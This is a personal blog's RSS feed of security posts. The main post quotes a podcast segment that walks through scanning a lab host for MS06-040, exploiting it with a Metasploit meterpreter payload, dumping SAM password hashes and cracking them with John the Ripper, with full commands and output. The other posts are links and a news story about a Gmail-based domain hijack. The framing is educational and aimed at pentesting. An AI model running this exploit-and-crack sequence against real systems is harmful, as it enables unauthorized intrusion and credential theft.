<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>E-Z Life &#187; Hacking</title>
	<atom:link href="http://www.ezrahill.co.uk/tag/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ezrahill.co.uk</link>
	<description>- Daily Diary of Ezra Hill</description>
	<lastBuildDate>Wed, 08 Feb 2012 18:12:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Tech Segment: Probe, Exploit, and Crack for Free &#8211; Pauldotcom.com</title>
		<link>http://www.ezrahill.co.uk/2008/05/08/tech-segment-probe-exploit-and-crack-for-free-pauldotcomcom/</link>
		<comments>http://www.ezrahill.co.uk/2008/05/08/tech-segment-probe-exploit-and-crack-for-free-pauldotcomcom/#comments</comments>
		<pubDate>Thu, 08 May 2008 20:22:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.ezrahill.co.uk/2008/05/08/tech-segment-probe-exploit-and-crack-for-free-pauldotcomcom/</guid>
		<description><![CDATA[Episode106 &#8211; PaulDotCom Security Weekly Tech Segment: Probe, Exploit, and Crack for Free On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show I run the nessuscmd, tell it to OS fingerprint with [...]]]></description>
			<content:encoded><![CDATA[<p><br/><a href="http://pauldotcom.com/wiki/index.php/Episode106" >Episode106 &#8211; PaulDotCom Security Weekly</a> <br/><br />
<blockquote>Tech Segment: Probe, Exploit, and Crack for Free</p>
<p>On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show <img src='http://www.ezrahill.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.</p>
<p>root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139</p>
<p>It reports:</p>
<p>Host 192.168.10.139 is up<br />
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139<br />
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139<br />
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139<br />
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139<br />
+ Results found on 192.168.10.139 :<br />
   &#8211; Host information :<br />
     [i] Plugin ID 11936<br />
      | Remote operating system : Microsoft Windows XP<br />
      | Microsoft Windows XP Service Pack 1<br />
      | Confidence Level : 99<br />
      | Method : MSRPC<br />
      |<br />
      |<br />
      |<br />
      | The remote host is running one of these operating systems :<br />
      | Microsoft Windows XP<br />
      | Microsoft Windows XP Service Pack 1</p>
<p>   &#8211; Port netbios-ssn (139/tcp) is open<br />
   &#8211; Port microsoft-ds (445/tcp) is open<br />
     [!] Plugin ID 22194<br />
      |<br />
      | Synopsis :<br />
      |<br />
      |<br />
      | Arbitrary code can be executed on the remote host due to a flaw<br />
      | in the<br />
      | &#8216;server&#8217; service.<br />
      |<br />
      | Description :<br />
      |<br />
      |<br />
      | The remote host is vulnerable to a buffer overrun in the &#8216;Server&#8217;<br />
      | service<br />
      | which may allow an attacker to execute arbitrary code on the remote<br />
      | host<br />
      | with the &#8216;System&#8217; privileges.<br />
      |<br />
      | Solution :<br />
      |<br />
      |<br />
      | Microsoft has released a set of patches for Windows 2000, XP and<br />
      | 2003 :<br />
      |<br />
      |<br />
      | http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx<br />
      |<br />
      |<br />
      |<br />
      | Risk factor :<br />
      |<br />
      |<br />
      | Critical / CVSS Base Score : 10.0<br />
      | (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)<br />
      | CVE : CVE-2006-3439<br />
      | BID : 19409</p>
<p>Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:</p>
<p>/framework-3.1/trunk gordon$ ./msfconsole </p>
<p>                 o                       8         o   o<br />
                 8                       8             8<br />
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P<br />
8&#8242; 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8<br />
8  8  8 8.       8  8    8   &#8216;Yb. 8    8 8 8    8  8   8<br />
8  8  8 `Yooo&#8217;   8  `YooP8 `YooP&#8217; 8YooP&#8217; 8 `YooP&#8217;  8   8<br />
..:..:..:&#8230;..:::..::&#8230;..::&#8230;..:8&#8230;..:..:&#8230;..::..::..:<br />
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::<br />
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::</p>
<p>       =[ msf v3.2-release<br />
+ -- --=[ 286 exploits - 124 payloads<br />
+ -- --=[ 17 encoders - 6 nops<br />
       =[ 62 aux</p>
<p>I want to tell metasploit to use the following module:</p>
<p>msf > use windows/smb/ms06_040_netapi</p>
<p>I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:</p>
<p>msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp<br />
PAYLOAD => windows/meterpreter/bind_tcp</p>
<p>I then tell metasploit what to target:</p>
<p>msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139</p>
<p>Here are what my options look like:</p>
<p>msf exploit(ms06_040_netapi) > show options</p>
<p>Module options:</p>
<p>   Name     Current Setting  Required  Description<br />
   ----     ---------------  --------  -----------<br />
   RHOST    192.168.10.139   yes       The target address<br />
   RPORT    445              yes       Set the SMB service port<br />
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  </p>
<p>Payload options:</p>
<p>   Name      Current Setting                                                Required  Description<br />
   ----      ---------------                                                --------  -----------<br />
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload<br />
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process<br />
   LPORT     4444                                                           yes       The local port                        </p>
<p>Exploit target:</p>
<p>   Id  Name<br />
   --  ----<br />
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)</p>
<p>Now I tell metasploit to execute my exploit with the above options:</p>
<p>msf exploit(ms06_040_netapi) > exploit</p>
<p>[*] Started bind handler<br />
[*] Detected a Windows XP SP0/SP1 target<br />
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] &#8230;<br />
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] &#8230;<br />
[*] Building the stub data&#8230;<br />
[*] Calling the vulnerable function&#8230;<br />
[*] Transmitting intermediate stager for over-sized stage&#8230;(89 bytes)<br />
[*] Sending stage (2834 bytes)<br />
[*] Sleeping before handling stage&#8230;<br />
[*] Uploading DLL (81931 bytes)&#8230;<br />
[*] Upload completed.<br />
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)</p>
<p>To access session 1 I use the following command:</p>
<p>msf exploit(ms06_040_netapi) > sessions -i 1</p>
<p>I then tell meterpreter to load the Sam Juicer module:</p>
<p>meterpreter > use -m Sam</p>
<p>Then I issue the &#8220;hashdump&#8221; command:</p>
<p>meterpreter > hashdump<br />
Administrator:500:EDIT:EDIT:::<br />
Guest:501:EDIT:EDIT:::<br />
HelpAssistant:1000:EDIT:EDIT:::<br />
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br />
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::<br />
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::</p>
<p>So then I copy and paste those results into my other directory with John The Ripper Installed:</p>
<p>paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt<br />
Administrator:500:EDIT:EDIT:::<br />
Guest:501:EDIT:EDIT:::<br />
HelpAssistant:1000:EDIT:EDIT:::<br />
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br />
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::<br />
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::</p>
<p>Then I crack the passwords using the stock dictionary that comes with John:</p>
<p>paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt<br />
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])<br />
TEAMTED          (TeamTed)<br />
                 (SUPPORT_388945a0)<br />
                 (Noone)<br />
                 (Guest)<br />
COM              (Administrator:2)<br />
guesses: 5  time: 0:00:00:02 (3)  c/s: 11060K  trying: TOUSCEL &#8211; TOUSMIR<br />
Session aborted</p>
<p>W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!</blockquote</p>
<!-- Social Bookmarks BEGIN -->
<div class="social_bookmark">
<a title="Click me to see the sites." href="#" onclick="$$('div.d4034').each( function(e) { e.visualEffect('slide_down',{duration:2.5}) }); return false;"><strong><em>Share</em></strong></a>
<br />
<div class="d4034" style="overflow:hidden">
<br />
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F&amp;title=Tech+Segment%3A+Probe%2C+Exploit%2C+and+Crack+for+Free+%26%238211%3B+Pauldotcom.com" rel="nofollow" title="Add to&nbsp;Del.icio.us"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/delicious.png" title="Add to&nbsp;Del.icio.us" alt="Add to&nbsp;Del.icio.us" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F&amp;title=Tech+Segment%3A+Probe%2C+Exploit%2C+and+Crack+for+Free+%26%238211%3B+Pauldotcom.com" rel="nofollow" title="Add to&nbsp;digg"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/digg.png" title="Add to&nbsp;digg" alt="Add to&nbsp;digg" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F" rel="nofollow" title="Add to&nbsp;Facebook"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/facebook.png" title="Add to&nbsp;Facebook" alt="Add to&nbsp;Facebook" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F&amp;title=Tech+Segment%3A+Probe%2C+Exploit%2C+and+Crack+for+Free+%26%238211%3B+Pauldotcom.com" rel="nofollow" title="Add to&nbsp;Google Bookmarks"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/google.png" title="Add to&nbsp;Google Bookmarks" alt="Add to&nbsp;Google Bookmarks" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F&amp;title=Tech+Segment%3A+Probe%2C+Exploit%2C+and+Crack+for+Free+%26%238211%3B+Pauldotcom.com" rel="nofollow" title="Add to&nbsp;Stumble Upon"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/stumbleupon.png" title="Add to&nbsp;Stumble Upon" alt="Add to&nbsp;Stumble Upon" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home/?status=Check+out+Tech+Segment%3A+Probe%2C+Exploit%2C+and+Crack+for+Free+%26%238211%3B+Pauldotcom.com+@+http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F05%2F08%2Ftech-segment-probe-exploit-and-crack-for-free-pauldotcomcom%2F" rel="nofollow" title="Add to&nbsp;Twitter"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/twitter.png" title="Add to&nbsp;Twitter" alt="Add to&nbsp;Twitter" /></a>
<br />
<a style="font-size:90%;text-align: right; " title="Click me to hide the sites." href="#" onclick="$$('div.d4034').each( function(e) { e.visualEffect('slide_up',{duration:0.5}) }); return false;">Hide Sites</a>
</div>
</div>
<!-- Social Bookmarks END -->
]]></content:encoded>
			<wfw:commentRss>http://www.ezrahill.co.uk/2008/05/08/tech-segment-probe-exploit-and-crack-for-free-pauldotcomcom/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Security and Hacking Documentation</title>
		<link>http://www.ezrahill.co.uk/2008/03/07/security-and-hacking-documentation/</link>
		<comments>http://www.ezrahill.co.uk/2008/03/07/security-and-hacking-documentation/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 12:28:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Diary Entry]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.ezrahill.co.uk/2008/03/07/security-and-hacking-documentation/</guid>
		<description><![CDATA[If you are interested to learn something about IT Security, Hacking or Vulnerability Exploitation this is the right place where to start. In this page i put more than 200 papers and the links of more than 100 books on this topic.read more &#124; digg story Share Hide Sites]]></description>
			<content:encoded><![CDATA[<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
google_ad_slot = "1232232141";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
If you are interested to learn something about IT Security, Hacking or Vulnerability Exploitation this is the right place where to start. In this page i put more than 200 papers and the links of more than 100 books on this topic.<br/><br/><a href="http://www.orkspace.net/secdocs/">read more</a> | <a href="/security/Security_and_Hacking_Documentation_2">digg story</a></p>
<!-- Social Bookmarks BEGIN -->
<div class="social_bookmark">
<a title="Click me to see the sites." href="#" onclick="$$('div.d3871').each( function(e) { e.visualEffect('slide_down',{duration:2.5}) }); return false;"><strong><em>Share</em></strong></a>
<br />
<div class="d3871" style="overflow:hidden">
<br />
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F&amp;title=Security+and+Hacking+Documentation" rel="nofollow" title="Add to&nbsp;Del.icio.us"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/delicious.png" title="Add to&nbsp;Del.icio.us" alt="Add to&nbsp;Del.icio.us" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F&amp;title=Security+and+Hacking+Documentation" rel="nofollow" title="Add to&nbsp;digg"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/digg.png" title="Add to&nbsp;digg" alt="Add to&nbsp;digg" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F" rel="nofollow" title="Add to&nbsp;Facebook"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/facebook.png" title="Add to&nbsp;Facebook" alt="Add to&nbsp;Facebook" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F&amp;title=Security+and+Hacking+Documentation" rel="nofollow" title="Add to&nbsp;Google Bookmarks"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/google.png" title="Add to&nbsp;Google Bookmarks" alt="Add to&nbsp;Google Bookmarks" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F&amp;title=Security+and+Hacking+Documentation" rel="nofollow" title="Add to&nbsp;Stumble Upon"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/stumbleupon.png" title="Add to&nbsp;Stumble Upon" alt="Add to&nbsp;Stumble Upon" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home/?status=Check+out+Security+and+Hacking+Documentation+@+http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F03%2F07%2Fsecurity-and-hacking-documentation%2F" rel="nofollow" title="Add to&nbsp;Twitter"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/twitter.png" title="Add to&nbsp;Twitter" alt="Add to&nbsp;Twitter" /></a>
<br />
<a style="font-size:90%;text-align: right; " title="Click me to hide the sites." href="#" onclick="$$('div.d3871').each( function(e) { e.visualEffect('slide_up',{duration:0.5}) }); return false;">Hide Sites</a>
</div>
</div>
<!-- Social Bookmarks END -->
]]></content:encoded>
			<wfw:commentRss>http://www.ezrahill.co.uk/2008/03/07/security-and-hacking-documentation/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DefCon 15 Audio / Video / Podcast</title>
		<link>http://www.ezrahill.co.uk/2008/02/08/defcon-15-audio-video-podcast/</link>
		<comments>http://www.ezrahill.co.uk/2008/02/08/defcon-15-audio-video-podcast/#comments</comments>
		<pubDate>Fri, 08 Feb 2008 17:12:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Audio]]></category>
		<category><![CDATA[DefCon]]></category>
		<category><![CDATA[Diary Entry]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[MP3]]></category>
		<category><![CDATA[MP4]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.ezrahill.co.uk/2008/02/08/defcon-15-audio-video-podcast/</guid>
		<description><![CDATA[Peps, I have been trying to get a full list of the speakers of DefCon 15 in mp3 but have not found much just the odd file here and there. This morning as I was loading up my TomTom 910 for the day ahead, I came across a site which claims to be the Official [...]]]></description>
			<content:encoded><![CDATA[<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
google_ad_slot = "1232232141";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><img src='http://www.ezrahill.co.uk/wp-content/2008/02/defcon-15-itunes-logo.jpg' alt='DefCon 15 Logo' /></p>
<p>Peps,</p>
<p>I have been trying to get a full list of the speakers of DefCon 15 in mp3 but have not found much just the odd file here and there.</p>
<p>This morning as I was loading up my TomTom 910 for the day ahead, I came across a site which claims to be the <a href="http://security4all.blogspot.com/2008/02/official-defcon-15-recordings-online.html">Official Defcon 15 Recordings Site</a>.</p>
<p>These files are all hosted on <a href="http://www.defcon.org/">defcon.org</a> and you can subscribe to them as Podcasts.</p>
<p><a href="feed://www.defcon.org/podcast/defcon-15-audio.rss">DefCon 15 Audio in MP3</a><br />
<a href="feed://www.defcon.org/podcast/defcon-15-video.rss">DefCon 15 Video in MP4</a></p>
<p>Right, back to the geek lab to have a play with what I have picked up today.</p>
<p>Enjoy</p>
<p>EH</p>
<!-- Social Bookmarks BEGIN -->
<div class="social_bookmark">
<a title="Click me to see the sites." href="#" onclick="$$('div.d3708').each( function(e) { e.visualEffect('slide_down',{duration:2.5}) }); return false;"><strong><em>Share</em></strong></a>
<br />
<div class="d3708" style="overflow:hidden">
<br />
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F&amp;title=DefCon+15+Audio+%2F+Video+%2F+Podcast" rel="nofollow" title="Add to&nbsp;Del.icio.us"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/delicious.png" title="Add to&nbsp;Del.icio.us" alt="Add to&nbsp;Del.icio.us" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F&amp;title=DefCon+15+Audio+%2F+Video+%2F+Podcast" rel="nofollow" title="Add to&nbsp;digg"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/digg.png" title="Add to&nbsp;digg" alt="Add to&nbsp;digg" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F" rel="nofollow" title="Add to&nbsp;Facebook"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/facebook.png" title="Add to&nbsp;Facebook" alt="Add to&nbsp;Facebook" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F&amp;title=DefCon+15+Audio+%2F+Video+%2F+Podcast" rel="nofollow" title="Add to&nbsp;Google Bookmarks"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/google.png" title="Add to&nbsp;Google Bookmarks" alt="Add to&nbsp;Google Bookmarks" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F&amp;title=DefCon+15+Audio+%2F+Video+%2F+Podcast" rel="nofollow" title="Add to&nbsp;Stumble Upon"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/stumbleupon.png" title="Add to&nbsp;Stumble Upon" alt="Add to&nbsp;Stumble Upon" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home/?status=Check+out+DefCon+15+Audio+%2F+Video+%2F+Podcast+@+http%3A%2F%2Fwww.ezrahill.co.uk%2F2008%2F02%2F08%2Fdefcon-15-audio-video-podcast%2F" rel="nofollow" title="Add to&nbsp;Twitter"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/twitter.png" title="Add to&nbsp;Twitter" alt="Add to&nbsp;Twitter" /></a>
<br />
<a style="font-size:90%;text-align: right; " title="Click me to hide the sites." href="#" onclick="$$('div.d3708').each( function(e) { e.visualEffect('slide_up',{duration:0.5}) }); return false;">Hide Sites</a>
</div>
</div>
<!-- Social Bookmarks END -->
]]></content:encoded>
			<wfw:commentRss>http://www.ezrahill.co.uk/2008/02/08/defcon-15-audio-video-podcast/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Gmail Exploit Aids Domain Hijack</title>
		<link>http://www.ezrahill.co.uk/2007/12/31/gmail-exploit-aids-domain-hijack/</link>
		<comments>http://www.ezrahill.co.uk/2007/12/31/gmail-exploit-aids-domain-hijack/#comments</comments>
		<pubDate>Mon, 31 Dec 2007 07:46:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.ezrahill.co.uk/2007/12/31/gmail-exploit-aids-domain-hijack/</guid>
		<description><![CDATA[&#160; Web designer David Airey has succeeded in recovering his domain after hackers exploited flaws in Gmail to trick his hosts into authorising a fraudulent transfer. Airey&#8217;s woes began when he took his girlfriend for a month-long holiday to India on 21 November, a trip he mentioned in his blog. The holiday was a break [...]]]></description>
			<content:encoded><![CDATA[<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
google_ad_slot = "1232232141";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>&#160;</p>
<blockquote><p>Web designer David Airey has succeeded in recovering his domain after hackers exploited flaws in Gmail to trick his hosts into authorising a fraudulent transfer.</p>
<p>Airey&#8217;s woes began when he took his girlfriend for a month-long holiday to India on 21 November, a trip he mentioned in his blog. The holiday was a break from work and he only occasionally checked his emails.</p>
<p>All seemed well until shortly before his return when Airey received an email from a friend informing him that his website, Davidairey.com, had &quot;disappeared&quot;.</p>
<p>At first Airey thought he&#8217;d made a mistake and allowed his domain name to expire and a domain poacher had snapped it up before he got the chance to renew it. Subsequent digging revealed a darker truth: hackers had posted a bogus transfer request on his web host support panel the day Airey left for India.</p>
<p>This, alongside an attack on a Gmail account run by Airey, allowed them to seize his domain and hold it for ransom. Initially crooks demanded $650 before dropping their offer down to $250.</p>
<p>Airey&#8217;s host, ICDSoft, were unable to reverse the transfer. The transfer request was initially sent to Airey&#8217;s Gmail account but forwarded to crooks after they used an exploit to forward the email to a third-party account. Gmail has since fixed the <a href="http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/">flaw</a> but Airey says that users would still be wise to check their account settings to verify that they too haven&#8217;t been hit by the hack.</p>
<p>Recovering the domain through legal action would eat up far more in lawyer&#8217;s fees, perhaps a minimum of $1,500, and might take months. During that time Airey would also lose passing trade that the domain brought in. In the meantime Airey has established an alternative Davidairey.co.uk website.</p>
</blockquote>
<p><a href="http://www.theregister.co.uk/2007/12/28/site_hijack_gmail_exploit/">Gmail exploit aids domain hijack</a></p>
<div class="wlWriterSmartContent" id="scid:B3E14793-948F-49af-A347-D19C374A7C4F:f3992701-5c64-4aed-9262-46fb1a6c8eef" style="padding-right: 0px; display: inline; padding-left: 0px; float: none; padding-bottom: 0px; margin: 0px; padding-top: 0px">
<p><script type="text/javascript"><!--
digg_url = "http://digg.com/security/Gmail_Exploit_Aids_Domain_Hijack";
digg_title = "Gmail Exploit Aids Domain Hijack";
digg_bodytext = "&nbsp;";
digg_topic = "security";
//--></script> <script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script> </div>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
